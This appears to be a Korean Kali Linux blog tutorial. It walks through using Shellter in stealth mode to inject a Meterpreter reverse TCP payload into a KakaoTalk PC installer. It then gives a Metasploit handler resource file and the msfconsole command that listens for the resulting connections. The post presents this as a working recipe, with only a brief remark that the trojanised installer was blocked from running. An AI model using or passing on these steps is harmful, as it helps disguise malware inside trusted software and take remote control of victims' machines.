OS/Kali Linux Custom Payload feat shellter
  • 728x90
    반응형




    Custom Payload

    feat. shellter





    shellter 설치 및 사용



    shellter 설치 명령어 


    root@kali:~# apt-get install shellter


    shellter 실행 명령어


    root@kali:~# shellter


    shellter 실행 화면 에서 Mode는 Auto 로 선택한 후 미리 받아놓은 카카오톡 PC 버전 설치파일 경로를 입력한다.



    설치 중간에 나오는 옵션은 아래와 같이 설정한다.


    Payload index 1은 Meterpreter_Reverse_TCP 이다.



    E m a b l e  S t e a l t h  M o d e ?  ( Y / N / H ) : y

    U s e  a  l i s t e d  p a y l o a d  o r  c u s t o m ?  ( L / C / H ) : l

    S e l e c t  p a y l o a d  b y  i n d e x : 1

    S E T  L H O S T : x x x . x x x . x x x . x x x

    S E T  L P O R T : 5 0 0 0



    위 과정을 통해 카카오 PC 버전 설치파일이 악성코드로 변환 된다.


    database 서비스 시작 명령어 


    root@kali:~/Desktop# service postgresql start


    Metasploit 리소스 파일을 아래와 같이 작성한다.



    [localhandler.rc]


    use exploit/multi/handler

    set payload windows/meterpreter/reverse_tcp

    set lhost xxx.xxx.xxx.xxx

    set lport 5000

    set exitonsession false

    set autorunscript post/windows/manage/priv_migrate

    exploit -j



    위에서 작성한 리소스 파일을 가지고 Metasploit 실행 


    root@kali:~/Desktop# msfconsole -r localhandler.rc


    악성코드로 변환된 카카오톡 설치파일은 철저한 보안으로 인해 실행되지는 않는다.


    하지만 리소스 파일의  set autorunscript  명령으로 Metasploit의 연결을 유지해준다.




    728x90
    반응형

    'OS > Kali Linux' 카테고리의 다른 글

    nmap 사용법  (0) 2018.04.11
    TCP idle Scan  (0) 2018.04.10
    Veil-evasion 설치 및 사용  (0) 2018.04.10
    kali linux(feat.python) IP SCAN  (0) 2018.04.05
    kali Linux 명령어 및 기초  (0) 2018.04.04
상단으로